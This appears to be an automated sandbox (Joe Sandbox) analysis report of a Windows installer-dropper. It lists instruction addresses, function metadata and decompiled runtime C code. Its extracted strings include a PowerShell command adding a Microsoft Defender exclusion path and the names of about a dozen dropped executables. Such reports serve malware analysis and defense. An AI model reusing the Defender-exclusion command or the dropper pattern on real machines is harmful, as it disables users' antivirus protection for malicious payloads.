                                                                                                                            0x0040163e
                                                                                                                            0x00401646
                                                                                                                            0x0040164c
                                                                                                                            0x00401651
                                                                                                                            0x00401659
                                                                                                                            0x00401665
                                                                                                                            0x00401667
                                                                                                                            0x0040166a
                                                                                                                            0x00401672
                                                                                                                            0x0040167a
                                                                                                                            0x0040168b
                                                                                                                            0x00401696
                                                                                                                            0x004016a7
                                                                                                                            0x004016ae
                                                                                                                            0x004016b3
                                                                                                                            0x004016b8
                                                                                                                            0x004016c7
                                                                                                                            0x004016cb
                                                                                                                            0x004016d3
                                                                                                                            0x004016d6
                                                                                                                            0x004016e1
                                                                                                                            0x004016ef
                                                                                                                            0x004016f3
                                                                                                                            0x004016f6
                                                                                                                            0x00401703
                                                                                                                            0x00401710
                                                                                                                            0x0040171d
                                                                                                                            0x0040172a
                                                                                                                            0x0040172f
                                                                                                                            0x00401737
                                                                                                                            0x0040173f
                                                                                                                            0x00401741
                                                                                                                            0x0040174c
                                                                                                                            0x0040175d
                                                                                                                            0x00401761
                                                                                                                            0x0040176a
                                                                                                                            0x0040176f
                                                                                                                            0x0040177a
                                                                                                                            0x00401787
                                                                                                                            0x00401798
                                                                                                                            0x0040179c
                                                                                                                            0x004017a5
                                                                                                                            0x004017aa
                                                                                                                            0x004017b5
                                                                                                                            0x004017c2
                                                                                                                            0x004017d3
                                                                                                                            0x004017d7
                                                                                                                            0x004017e0
                                                                                                                            0x004017e5
                                                                                                                            0x004017f0
                                                                                                                            0x004017fd
                                                                                                                            0x0040180e
                                                                                                                            0x00401812
                                                                                                                            0x0040181b
                                                                                                                            0x00401820
                                                                                                                            0x0040182b
                                                                                                                            0x00401838
                                                                                                                            0x00401849
                                                                                                                            0x0040184d
                                                                                                                            0x00401856
                                                                                                                            0x0040185b
                                                                                                                            0x00401866
                                                                                                                            0x00401873
                                                                                                                            0x00401884
                                                                                                                            0x00401888
                                                                                                                            0x00401891
                                                                                                                            0x00401896
                                                                                                                            0x004018a1
                                                                                                                            0x004018ae
                                                                                                                            0x004018bf
                                                                                                                            0x004018c3
                                                                                                                            0x004018cc
                                                                                                                            0x004018d1
                                                                                                                            0x004018dc
                                                                                                                            0x004018e9
                                                                                                                            0x004018fa
                                                                                                                            0x004018fe
                                                                                                                            0x00401907
                                                                                                                            0x0040190c
                                                                                                                            0x00401917
                                                                                                                            0x00401924
                                                                                                                            0x00401935
                                                                                                                            0x00401939
                                                                                                                            0x00401942
                                                                                                                            0x00401947
                                                                                                                            0x00401952
                                                                                                                            0x0040195f
                                                                                                                            0x00401970
                                                                                                                            0x00401974
                                                                                                                            0x0040197d
                                                                                                                            0x00401982
                                                                                                                            0x0040198d
                                                                                                                            0x0040199a
                                                                                                                            0x004019ab
                                                                                                                            0x004019af
                                                                                                                            0x004019b8
                                                                                                                            0x004019bd
                                                                                                                            0x004019c8
                                                                                                                            0x004019d5
                                                                                                                            0x004019e6
                                                                                                                            0x004019ea
                                                                                                                            0x004019f3
                                                                                                                            0x004019f8
                                                                                                                            0x00401a03
                                                                                                                            0x00401a10
                                                                                                                            0x00401a21
                                                                                                                            0x00401a25
                                                                                                                            0x00401a2e
                                                                                                                            0x00401a33
                                                                                                                            0x00401a3e
                                                                                                                            0x00401a4b
                                                                                                                            0x00401a5c
                                                                                                                            0x00401a60
                                                                                                                            0x00401a69
                                                                                                                            0x00401a6e
                                                                                                                            0x00401a79
                                                                                                                            0x00401a86
                                                                                                                            0x00401a97
                                                                                                                            0x00401a9b
                                                                                                                            0x00401aa4
                                                                                                                            0x00401aa9
                                                                                                                            0x00401ab4
                                                                                                                            0x00401ac1
                                                                                                                            0x00401ad2
                                                                                                                            0x00401ad6
                                                                                                                            0x00401adf
                                                                                                                            0x00401ae4
                                                                                                                            0x00401aef
                                                                                                                            0x00401afc
                                                                                                                            0x00401b0d
                                                                                                                            0x00401b11
                                                                                                                            0x00401b1a
                                                                                                                            0x00401b1f
                                                                                                                            0x00401b2a
                                                                                                                            0x00401b37
                                                                                                                            0x00401b48
                                                                                                                            0x00401b4c
                                                                                                                            0x00401b55
                                                                                                                            0x00401b5a
                                                                                                                            0x00401b65
                                                                                                                            0x00401b72
                                                                                                                            0x00401b83
                                                                                                                            0x00401b87
                                                                                                                            0x00401b90
                                                                                                                            0x00401b95
                                                                                                                            0x00401ba0
                                                                                                                            0x00401bad
                                                                                                                            0x00401bbe
                                                                                                                            0x00401bc2
                                                                                                                            0x00401bcb
                                                                                                                            0x00401bd0
                                                                                                                            0x00401bdb
                                                                                                                            0x00401be8
                                                                                                                            0x00401bf9
                                                                                                                            0x00401bfd
                                                                                                                            0x00401c06
                                                                                                                            0x00401c0b
                                                                                                                            0x00401c16
                                                                                                                            0x00401c23
                                                                                                                            0x00401c34
                                                                                                                            0x00401c38
                                                                                                                            0x00401c41
                                                                                                                            0x00401c46
                                                                                                                            0x00401c51
                                                                                                                            0x00401c5e
                                                                                                                            0x00401c6f
                                                                                                                            0x00401c73
                                                                                                                            0x00401c7c
                                                                                                                            0x00401c81
                                                                                                                            0x00401c8c
                                                                                                                            0x00401c99
                                                                                                                            0x00401caa
                                                                                                                            0x00401cae
                                                                                                                            0x00401cb7
                                                                                                                            0x00401cbc
                                                                                                                            0x00401cc7
                                                                                                                            0x00401cd8
                                                                                                                            0x00401ce2
                                                                                                                            0x00401ce6
                                                                                                                            0x00401ce9
                                                                                                                            0x00401cf6
                                                                                                                            0x00401cfb
                                                                                                                            0x00401d03
                                                                                                                            0x00401d0b
                                                                                                                            0x00401d0d
                                                                                                                            0x00401d18
                                                                                                                            0x00401d2a
                                                                                                                            0x00401d2d
                                                                                                                            0x00401d34
                                                                                                                            0x00401d3b
                                                                                                                            0x00401d3b
                                                                                                                            0x00401d3e
                                                                                                                            0x00401d3e
                                                                                                                            0x00401d4f
                                                                                                                            0x00401d59
                                                                                                                            0x00401d5d
                                                                                                                            0x00401d60
                                                                                                                            0x00401d6d
                                                                                                                            0x00401d72
                                                                                                                            0x00401d7a
                                                                                                                            0x00401d82
                                                                                                                            0x00401d84
                                                                                                                            0x00401d8f
                                                                                                                            0x00401da4
                                                                                                                            0x00401dab
                                                                                                                            0x00401db2
                                                                                                                            0x00401db2
                                                                                                                            0x00401db5
                                                                                                                            0x00401db5
                                                                                                                            0x00401dc6
                                                                                                                            0x00401dd0
                                                                                                                            0x00401dd4
                                                                                                                            0x00401dd7
                                                                                                                            0x00401de4
                                                                                                                            0x00401de9
                                                                                                                            0x00401df1
                                                                                                                            0x00401df9
                                                                                                                            0x00401dfb
                                                                                                                            0x00401e06
                                                                                                                            0x00401e1b
                                                                                                                            0x00401e22
                                                                                                                            0x00401e29
                                                                                                                            0x00401e29
                                                                                                                            0x00401e2c
                                                                                                                            0x00401e2c
                                                                                                                            0x00401e3d
                                                                                                                            0x00401e47
                                                                                                                            0x00401e4b
                                                                                                                            0x00401e4e
                                                                                                                            0x00401e5b
                                                                                                                            0x00401e60
                                                                                                                            0x00401e68
                                                                                                                            0x00401e70
                                                                                                                            0x00401e72
                                                                                                                            0x00401e7d
                                                                                                                            0x00401e92
                                                                                                                            0x00401e99
                                                                                                                            0x00401ea0
                                                                                                                            0x00401ea0
                                                                                                                            0x00401ea3
                                                                                                                            0x00401ea3
                                                                                                                            0x00401eb4
                                                                                                                            0x00401ebe
                                                                                                                            0x00401ec2
                                                                                                                            0x00401ec5
                                                                                                                            0x00401ed2
                                                                                                                            0x00401ed7
                                                                                                                            0x00401edf
                                                                                                                            0x00401ee7
                                                                                                                            0x00401ee9
                                                                                                                            0x00401ef4
                                                                                                                            0x00401f09
                                                                                                                            0x00401f10
                                                                                                                            0x00401f17
                                                                                                                            0x00401f17
                                                                                                                            0x00401f1a
                                                                                                                            0x00401f1a
                                                                                                                            0x00401f2b
                                                                                                                            0x00401f35
                                                                                                                            0x00401f39
                                                                                                                            0x00401f3c
                                                                                                                            0x00401f49
                                                                                                                            0x00401f4e
                                                                                                                            0x00401f56
                                                                                                                            0x00401f5e
                                                                                                                            0x00401f60
                                                                                                                            0x00401f6b
                                                                                                                            0x00401f80
                                                                                                                            0x00401f87
                                                                                                                            0x00401f8e
                                                                                                                            0x00401f8e
                                                                                                                            0x00401f91
                                                                                                                            0x00401f91
                                                                                                                            0x00401fa2
                                                                                                                            0x00401fac
                                                                                                                            0x00401fb0
                                                                                                                            0x00401fb3
                                                                                                                            0x00401fc0
                                                                                                                            0x00401fc5
                                                                                                                            0x00401fcd
                                                                                                                            0x00401fd5
                                                                                                                            0x00401fd7
                                                                                                                            0x00401fe2
                                                                                                                            0x00401ff7
                                                                                                                            0x00401ffe
                                                                                                                            0x00402005
                                                                                                                            0x00402005
                                                                                                                            0x00402008
                                                                                                                            0x00402008
                                                                                                                            0x00402019
                                                                                                                            0x00402023
                                                                                                                            0x00402027
                                                                                                                            0x0040202a
                                                                                                                            0x00402037
                                                                                                                            0x0040203c
                                                                                                                            0x00402044
                                                                                                                            0x0040204c
                                                                                                                            0x0040204e
                                                                                                                            0x00402059
                                                                                                                            0x0040206e
                                                                                                                            0x00402075
                                                                                                                            0x0040207c
                                                                                                                            0x0040207c
                                                                                                                            0x0040207f
                                                                                                                            0x0040207f
                                                                                                                            0x00402090
                                                                                                                            0x0040209a
                                                                                                                            0x0040209e
                                                                                                                            0x004020a1
                                                                                                                            0x004020ae
                                                                                                                            0x004020b3
                                                                                                                            0x004020bb
                                                                                                                            0x004020c3
                                                                                                                            0x004020c5
                                                                                                                            0x004020d0
                                                                                                                            0x004020e5
                                                                                                                            0x004020ec
                                                                                                                            0x004020f3
                                                                                                                            0x004020f3
                                                                                                                            0x004020f6
                                                                                                                            0x004020f6
                                                                                                                            0x00402107
                                                                                                                            0x00402111
                                                                                                                            0x00402115
                                                                                                                            0x00402118
                                                                                                                            0x00402125
                                                                                                                            0x0040212a
                                                                                                                            0x00402132
                                                                                                                            0x0040213a
                                                                                                                            0x0040213c
                                                                                                                            0x00402147
                                                                                                                            0x0040215c
                                                                                                                            0x00402163
                                                                                                                            0x0040216a
                                                                                                                            0x0040216a
                                                                                                                            0x0040216d
                                                                                                                            0x0040216d
                                                                                                                            0x0040217b
                                                                                                                            0x00402185
                                                                                                                            0x00402189
                                                                                                                            0x0040218c
                                                                                                                            0x00402196
                                                                                                                            0x0040219b
                                                                                                                            0x004021a3
                                                                                                                            0x004021ab
                                                                                                                            0x004021ad
                                                                                                                            0x004021b5
                                                                                                                            0x004021ca
                                                                                                                            0x004021d1
                                                                                                                            0x004021d8
                                                                                                                            0x004021d8
                                                                                                                            0x004021db
                                                                                                                            0x004021db
                                                                                                                            0x004021e9
                                                                                                                            0x004021f3
                                                                                                                            0x004021f7
                                                                                                                            0x004021fa
                                                                                                                            0x00402204
                                                                                                                            0x00402209
                                                                                                                            0x00402211
                                                                                                                            0x00402219
                                                                                                                            0x0040221b
                                                                                                                            0x00402223
                                                                                                                            0x00402238
                                                                                                                            0x0040223f
                                                                                                                            0x00402249
                                                                                                                            0x00402249
                                                                                                                            0x0040225b
                                                                                                                            0x00402268
                                                                                                                            0x00402275
                                                                                                                            0x00402282
                                                                                                                            0x0040228f
                                                                                                                            0x0040229c
                                                                                                                            0x004022a9
                                                                                                                            0x004022b6
                                                                                                                            0x004022c3
                                                                                                                            0x004022d0
                                                                                                                            0x004022dd
                                                                                                                            0x004022ea
                                                                                                                            0x004022f7
                                                                                                                            0x00402304
                                                                                                                            0x00402311
                                                                                                                            0x0040231e
                                                                                                                            0x0040232b
                                                                                                                            0x00402338
                                                                                                                            0x00402345
                                                                                                                            0x00402352
                                                                                                                            0x0040235f
                                                                                                                            0x0040236c
                                                                                                                            0x00402379
                                                                                                                            0x00402386
                                                                                                                            0x00402393
                                                                                                                            0x004028e0

                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            • 62829258f111c_8df26f0c7d.exe, xrefs: 00401A25
                                                                                                                            • 6282925b8abce_97dd7946.exe, xrefs: 00401B11
                                                                                                                            • 6282925ab52f1_fdd12e5.exe, xrefs: 00401A9B
                                                                                                                            • powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath ", xrefs: 004016CB
                                                                                                                            • 6282925ea53e7_da60dc03.exe, xrefs: 00401C73
                                                                                                                            • 62829252dc457_91e450cbce.exe, xrefs: 004018C3
                                                                                                                            • 6282925c504be_44b654a9fe.exe, xrefs: 00401B87
                                                                                                                            • ConsoleWindowClass, xrefs: 00401659
                                                                                                                            • /mixtwo, xrefs: 00401A60
                                                                                                                            • 62829251169ea_9dc91d.exe, xrefs: 0040184D
                                                                                                                            • 6282925d5ee10_0da12a.exe, xrefs: 00401BFD
                                                                                                                            • 62829254ab49d_fc210c4a.exe, xrefs: 00401939
                                                                                                                            • 6282925776f05_4ee107b.exe, xrefs: 004019AF
                                                                                                                            • TEMP, xrefs: 0040167F
                                                                                                                            • 628292505a6c3_91a0215e.exe, xrefs: 004017D7
                                                                                                                            • 6282924fea1c3_82ebfc59.exe, xrefs: 00401761
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.287032717.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.287009661.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287101526.000000000049F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287122632.00000000004A1000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287156446.00000000004E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287161062.00000000004E9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287176297.000000000050C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_400000_setup_install.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _popen$FindWindowgetenvstrlen
                                                                                                                            • String ID: /mixtwo$6282924fea1c3_82ebfc59.exe$628292505a6c3_91a0215e.exe$62829251169ea_9dc91d.exe$62829252dc457_91e450cbce.exe$62829254ab49d_fc210c4a.exe$6282925776f05_4ee107b.exe$62829258f111c_8df26f0c7d.exe$6282925ab52f1_fdd12e5.exe$6282925b8abce_97dd7946.exe$6282925c504be_44b654a9fe.exe$6282925d5ee10_0da12a.exe$6282925ea53e7_da60dc03.exe$ConsoleWindowClass$TEMP$powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "
                                                                                                                            • API String ID: 4129114072-1688198714
                                                                                                                            • Opcode ID: 008f5846d01bdf8e3651b51b924ef4822a4e574bce260333d26f463c8b6bad1a
                                                                                                                            • Instruction ID: 8f1e97e70c3cc1e45d5ab15be74c2f24cd593be97a91b0119a2c168b07aa329d
                                                                                                                            • Opcode Fuzzy Hash: 008f5846d01bdf8e3651b51b924ef4822a4e574bce260333d26f463c8b6bad1a
                                                                                                                            • Instruction Fuzzy Hash: 7C725B70A147188BCF14FF71D8855DDB7F9AF88308F4089BFA84997251EB389A888F55
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00401299 Relevance: 7.6, APIs: 5, Instructions: 80stringCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 522 401299 523 4012a0-4012a3 522->523 524 4012a5-4012ad 523->524 525 4012af-4012bc 523->525 524->523 524->525 527 4012d2-4012f2 malloc 525->527 528 4012be-4012c7 525->528 531 401464 527->531 532 4012f8-401309 527->532 529 4013c0-4013c4 528->529 530 4012cd 528->530 529->530 530->527 534 40146c-401492 exit call 40c500 531->534 533 401310-401344 strlen malloc memcpy 532->533 533->533 535 401346-401398 call 40c4c0 call 401637 533->535 535->534 542 40139e-4013a6 535->542 543 4013b2-4013bd 542->543 544 4013a8-4013ad _cexit 542->544 544->543
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.287032717.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.287009661.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287101526.000000000049F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287122632.00000000004A1000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287156446.00000000004E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287161062.00000000004E9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287176297.000000000050C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_400000_setup_install.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: malloc$_cexitmemcpystrlen
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 701060287-0
                                                                                                                            • Opcode ID: af6af70250e2428e9bb01aff65897f96e9e22e5478decfd70c89a783a3503ec0
                                                                                                                            • Instruction ID: c6640a69f1d02d47ff4e2833d4c446de042344f20d19241825393f1ed329c4ac
                                                                                                                            • Opcode Fuzzy Hash: af6af70250e2428e9bb01aff65897f96e9e22e5478decfd70c89a783a3503ec0
                                                                                                                            • Instruction Fuzzy Hash: 233117B5A007448FDB10EF65D9C0699B7F1FB48318F14453EE948AB362E738A945CF89
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00401289 Relevance: 7.6, APIs: 5, Instructions: 77stringCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 545 401289-401292 547 401294 545->547 548 4012a5-4012ad 545->548 549 4012af-4012bc 547->549 548->549 550 4012a0-4012a3 548->550 552 4012d2-4012f2 malloc 549->552 553 4012be-4012c7 549->553 550->548 550->549 556 401464 552->556 557 4012f8-401309 552->557 554 4013c0-4013c4 553->554 555 4012cd 553->555 554->555 555->552 559 40146c-401492 exit call 40c500 556->559 558 401310-401344 strlen malloc memcpy 557->558 558->558 560 401346-401398 call 40c4c0 call 401637 558->560 560->559 567 40139e-4013a6 560->567 568 4013b2-4013bd 567->568 569 4013a8-4013ad _cexit 567->569 569->568
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.287032717.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.287009661.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287101526.000000000049F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287122632.00000000004A1000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287156446.00000000004E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287161062.00000000004E9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287176297.000000000050C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_400000_setup_install.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: malloc$_cexitmemcpystrlen
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 701060287-0
                                                                                                                            • Opcode ID: ba6e100598bf0100dfef1c0da1d4728aef06e55a223d9a295c57135ecbb67807
                                                                                                                            • Instruction ID: 50201521b2bec8f132d0cd31310035555caa3ee075fd6792636c27a20f8ad9b4
                                                                                                                            • Opcode Fuzzy Hash: ba6e100598bf0100dfef1c0da1d4728aef06e55a223d9a295c57135ecbb67807
                                                                                                                            • Instruction Fuzzy Hash: B83116B5A00640CBDB10EF65D9C0659B7E0FB48318F10453EE944AB362E738A945CF8A
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Non-executed Functions

                                                                                                                            Function 00498680 Relevance: 33.3, APIs: 18, Strings: 1, Instructions: 44fileCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            • Mingw-w64 runtime failure:, xrefs: 004986A8
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.287032717.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.287009661.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287101526.000000000049F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287122632.00000000004A1000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287156446.00000000004E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287161062.00000000004E9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287176297.000000000050C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_400000_setup_install.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: abort$fwritevfprintf
                                                                                                                            • String ID: Mingw-w64 runtime failure:
                                                                                                                            • API String ID: 2868300786-2889761391
                                                                                                                            • Opcode ID: bf872a345eaba31f8a8f898faf3acce82c45aa10998c648eb4f09b6688191019
                                                                                                                            • Instruction ID: f0038d649ab6d777957cdac4ea5d3ca0557a7c30160af374a45bd7bc0d04ab94
                                                                                                                            • Opcode Fuzzy Hash: bf872a345eaba31f8a8f898faf3acce82c45aa10998c648eb4f09b6688191019
                                                                                                                            • Instruction Fuzzy Hash: 60F0D0B08593088AC300BF65D0862BEFAF4EF86748F40A81EE0C857142C77C80829F9B
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0040EC60 Relevance: 28.3, APIs: 14, Strings: 2, Instructions: 255COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 42%
                                                                                                                            			E0040EC60(void* __eax, signed int __edx, intOrPtr _a148, signed int _a152, intOrPtr _a156, CHAR* _a160, char _a187) {
				void* _v16;
				char _v44;
				signed char _v57;
				signed int _v60;
				char* _v140;
				void _v156;
				char _v160;
				signed int _v176;
				void* _v180;
				char _v204;
				char* _v244;
				char _v264;
				intOrPtr _v272;
				char _v276;
				char _v424;
				signed int _v428;
				intOrPtr _v452;
				char _t142;
				struct HINSTANCE__* _t143;
				struct HINSTANCE__* _t146;
				_Unknown_base(*)()* _t147;
				void* _t150;
				CHAR* _t152;
				void* _t157;
				void* _t160;
				intOrPtr _t161;
				signed int _t169;
				signed int _t171;
				CHAR* _t172;
				struct HINSTANCE__* _t173;
				signed int _t174;
				signed char _t179;
				intOrPtr* _t181;
				signed int _t184;
				signed int _t189;
				signed int _t191;
				signed int _t195;
				void* _t197;
				char _t199;
				_Unknown_base(*)()* _t200;
				signed int _t201;
				signed int _t202;
				void* _t204;
				intOrPtr* _t206;
				char** _t207;
				char** _t208;
				struct HINSTANCE__** _t210;
				struct HINSTANCE__** _t211;

				_t202 = __edx;
				_t199 = __eax;
				_v180 = __eax;
				memcpy( &_v156, __eax, 0x20 << 2);
				_t206 = _t204 - 0xbc + 0xc;
				_t195 = _t199 + 0x40;
				_t184 = _v60;
				if((_t184 & 0x40000000) == 0 || _v44 == 0) {
					if(_v140 == 0) {
						_t142 =  *((intOrPtr*)(_v180 + 0x48));
						if( *0x4e53fc != 4) {
							goto L64;
						} else {
							_v160 = _t142;
							if((_t184 & 0x40000000) != 0) {
								_v44 = 0;
							}
							_v140 =  &_v160;
							goto L9;
						}
					} else {
						goto L9;
					}
				} else {
					L9:
					_t150 = _v180;
					if(( *(_t150 + 0x63) & 0x00000040) != 0) {
						 *((char*)(_t150 + 0x70)) = 0;
					}
					 *((intOrPtr*)(_v180 + 0x10)) = 0;
					_t152 = _a160;
					if(_t152 != 1) {
						if(_t152 != 2) {
							abort();
							_push(_t202);
							_t202 = _t184;
							_push(_t195);
							_push(_t199);
							_t199 = 0;
							_push(_t172);
							_t172 = _t152;
							_t197 = _t172;
							memset(_t197, 0, 0x20 << 2);
							_t206 = _t206 - 0xec + 0xc;
							_t195 = _t197 + 0x20;
							_t172[0x60] = 0x40000000;
							_t172[0x4c] = _v204;
							_t157 = E0040DFC0(_t172,  &_v424);
							if(_t157 != 0) {
								goto L65;
							} else {
								_v452 = 0x40df40;
								 *_t206 = 0x4e53f4;
								L0041BB68();
								if(_t157 != 0) {
									if( *0x4e53f8 == 0) {
										 *0x4e53f8 = 4;
										 *0x4e53fa = 4;
										 *0x4e53f9 = 4;
										 *0x4e53fb = 4;
										 *0x4e53fe = 4;
										 *0x4e53ff = 4;
										 *0x4e53fd = 4;
										 *0x4e53fc = 4;
										 *0x4e5403 = 0xc;
										 *0x4e5404 = 0xc;
										 *0x4e5405 = 0xc;
										 *0x4e5406 = 0xc;
										 *0x4e5407 = 0xc;
										 *0x4e5408 = 0xc;
										 *0x4e5401 = 4;
										 *0x4e5400 = 4;
									}
								}
								if( *0x4e53fc != 4) {
									goto L65;
								} else {
									_v428 = _t202;
									if((_t172[0x63] & 0x00000040) != 0) {
										_t172[0x70] = 0;
									}
									_v264 = 1;
									_t172[0x10] =  &_v428;
									_v272 = 4;
									_v276 = 0;
									_t160 = E0040EC60(_t172,  &_v424);
									_t172[0x4c] = _t199;
									return _t160;
								}
							}
						} else {
							_t161 = _a156;
							_t201 = 0;
							_t179 = 0;
							do {
								_t161 = _t161 + 1;
								_t174 =  *(_t161 - 1) & 0x000000ff;
								_t189 = (_t174 & 0x0000007f) << _t179;
								_t179 = _t179 + 7;
								_t201 = _t201 | _t189;
							} while (_t174 < 0);
							_v176 = E0040E5E0(_t161,  &_v156, _t161 + _t201, 0);
							goto L22;
						}
					} else {
						_t171 = _a152;
						if(_t171 > 0x11) {
							L64:
							abort();
							L65:
							abort();
							abort();
							abort();
							abort();
							abort();
							abort();
							abort();
							abort();
							abort();
							abort();
							abort();
							_push(_t202);
							_push(_t195);
							_push(_t199);
							_t207 = _t206 - 0x1c;
							 *_t207 = "libgcc_s_dw2-1.dll";
							_t143 = GetModuleHandleA(_t172);
							_t208 = _t207 - 4;
							if(_t143 == 0) {
								 *0x49f004 = 0x410d00;
								_t200 = E00410B90;
							} else {
								_t173 = _t143;
								 *_t208 = "libgcc_s_dw2-1.dll";
								_t146 = LoadLibraryA(??);
								_t210 = _t208 - 4;
								 *0x4e5df0 = _t146;
								_v244 = "__register_frame_info";
								 *_t210 = _t173;
								_t147 = GetProcAddress(??, ??);
								_t211 = _t210 - 8;
								_t200 = _t147;
								_v244 = "__deregister_frame_info";
								 *_t211 = _t173;
								 *0x49f004 = GetProcAddress(??, ??);
								_t208 = _t211 - 8;
							}
							if(_t200 != 0) {
								_v244 = 0x4e501c;
								 *_t208 = 0x4ab0f8;
								 *_t200();
							}
							 *_t208 = E00401590;
							return E004014C0();
						} else {
							_t172 =  *(_t171 + 0x4e53f8) & 0x000000ff;
							_t181 =  *((intOrPtr*)(_t206 + 0x30 + _t171 * 4));
							if((_t184 & 0x40000000) == 0 ||  *((char*)(_t206 + _t171 + 0x9c)) == 0) {
								if(_t172 != 4) {
									goto L64;
								} else {
									_t181 =  *_t181;
									goto L17;
								}
							} else {
								L17:
								_v176 = _t181 + _a148;
								L22:
								_t195 = _v176;
								_t172 = 0;
								 *((intOrPtr*)(_v180 + 0x48)) = _t195;
								do {
									if( *(_t202 + 4 + _t172 * 8) > 5) {
										goto L27;
									} else {
										switch( *((intOrPtr*)( *(_t202 + 4 + _t172 * 8) * 4 +  &M004A4E30))) {
											case 0:
												goto L27;
											case 1:
												__esi = _v180;
												__eax = _v176;
												__eax = _v176 +  *(__ebp + __ebx * 8);
												if(( *(__esi + 0x63) & 0x00000040) != 0) {
													goto L34;
												}
												goto L35;
											case 2:
												__eax =  *(__ebp + __ebx * 8);
												if( *((char*)(__esp + __eax + 0x9c)) != 0) {
													if(__eax > 0x11) {
														goto L64;
													} else {
														__edx =  *(__eax + 0x4e53f8) & 0x000000ff;
														__eax =  *(__esp + 0x30 + __eax * 4);
														if((_v57 & 0x00000040) != 0) {
															goto L43;
														} else {
															if(__dl != 4) {
																goto L64;
															} else {
																__eax =  *__eax;
																goto L43;
															}
														}
													}
												} else {
													__edi = _v180;
													__eax =  *(__esp + 0x30 + __eax * 4);
													if(( *(__edi + 0x63) & 0x00000040) != 0) {
														 *((char*)(__edi + __ebx + 0x6c)) = 0;
													}
													__esi = _v180;
													 *(_v180 + __ebx * 4) = __eax;
													goto L27;
												}
												goto L76;
											case 3:
												__eax =  *(__ebp + __ebx * 8);
												__edi = 0;
												__ecx = 0;
												__esi = __ebx;
												do {
													__eax = __eax + 1;
													__ebx =  *(__eax - 1) & 0x000000ff;
													 *(__eax - 1) & 0x000000ff =  *(__eax - 1) & 0x7f;
													__edx = ( *(__eax - 1) & 0x7f) << __cl;
													__ecx = __ecx + 7;
													__edi = __edi | ( *(__eax - 1) & 0x7f) << __cl;
												} while (__bl < 0);
												__ebx = __esi;
